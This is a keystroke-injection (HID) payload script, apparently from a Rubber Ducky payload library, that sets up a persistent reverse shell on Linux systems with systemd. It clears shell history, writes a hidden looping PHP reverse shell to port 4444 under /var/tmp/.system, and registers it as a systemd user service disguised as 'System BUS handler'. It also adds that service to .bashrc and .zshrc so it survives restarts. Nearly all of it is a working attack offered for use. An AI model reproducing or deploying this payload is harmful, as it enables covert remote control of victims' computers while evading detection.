Path: blob/master/payloads/library/remote_access/persistentReverseDucky/payload.txt
2964 views
REM Title: persistentReverseDucky1REM Description: persistentReverseDucky provides you persistent reverse shell remotely/locally by creating non-root systemd service.2REM AUTHOR: drapl0n3REM Version: 1.04REM Category: Remote Access5REM Target: Unix-like operating systems with systemd6REM Attackmodes: HID78REM [keeping tracks clear]9DELAY 50010CTRL-ALT t11DELAY 40012STRING unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE13ENTER14DELAY 1001516REM [creating reverse shell]17STRING mkdir /var/tmp/.system18ENTER19DELAY 10020STRING echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/bin/sh -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus21ENTER22DELAY 10023STRING chmod +x /var/tmp/.system/systemBus24ENTER25DELAY 1002627REM [creating non-root systemd service]28STRING mkdir -p ~/.config/systemd/user29ENTER30DELAY 10031STRING echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service32ENTER33DELAY 1003435REM [enabling service]36STRING systemctl --user daemon-reload37ENTER38STRING systemctl --user enable --now systemBUS.service39ENTER40STRING systemctl --user start --now systemBUS.service41ENTER42DELAY 1004344REM [autostarting service on terminal/shell launch]45STRING echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ $? = 0 ]; then\n\techo systemctl --user enable --now systemBUS.service >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ $? = 0 ]; then\n\techo systemctl --user enable --now systemBUS.service >> ~/.bashrc\nfi\n\n" > ~/tmmmp46ENTER47DELAY 5048STRING chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit49ENTER505152